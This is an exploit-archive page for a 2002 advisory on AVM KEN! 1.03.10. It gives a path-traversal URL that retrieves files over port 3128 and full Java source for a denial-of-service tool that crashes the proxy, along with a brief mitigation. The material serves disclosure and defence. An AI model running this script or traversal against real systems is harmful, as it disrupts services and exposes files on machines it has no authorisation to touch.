header-logo
Suggest Exploit
vendor:
KEN!
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Retrieval and Denial of Service
20
CWE
Product Name: KEN!
Affected Version From: 01.03.10
Affected Version To: 01.03.10
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

AVM KEN! Remote File Retrieval and Denial of Service Vulnerability

A remote user on the local network is capable of retrieving any known file from a machine running AVM KEN! by appending ../ to a URL utilizing port 3128 to escape the regular web file structure, and appending the remaining path onto the request. A denial of service attack could also be launched against AVM KEN! by sending random characters to port 3128. A restart would be required in order to regain normal functionality.

Mitigation:

Restrict access to port 3128 and ensure that the latest version of AVM KEN! is installed.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1103/info

A remote user on the local network is capable of retrieving any known file from a machine running AVM KEN!. This is accomplished by appending ../ to a URL utilizing port 3128 to escape the regular web file structure, and appending the remaining path onto the request.
eg.
http://target:3128/../../../filename.ext

A denial of service attack could also be launched against AVM KEN! by sending random characters to port 3128. A restart would be required in order to regain normal functionality. 

import java.net.Socket;
import java.io.*;

/*
BARBIE - The AVM KEN! exploit

This exploit causes a crash in the AVM KEN! ISDN Proxy software.
All conections will be cut off, but the server will restart again, 
a few seconds later.

Tested with AVM KEN! Version 1.03.10 (german)
*/

class barbie {

String adress;

public void killken() { 
PrintWriter out = null;
try{
    Socket connection = new Socket( adress, 3128);
    System.out.println("");
    System.out.println("killing..."); 
    out  = new PrintWriter(connection.getOutputStream(), true);
    out.println("Whooopppss_Ken_died");
    connection.close();
   }
catch (IOException e)
{
System.out.println("");
System.out.println(" Can't met Ken! ");
}  
}


public static void main (String arguments[]) {
barbie kk = new barbie();
if(arguments.length < 1)
{
System.out.println("");
System.out.println("usage: java barbie <adress/ip>");
System.exit(1);
}
kk.adress = arguments[0];
kk.killken();
}

}

Navigation

Suggest Exploit

Services By CQR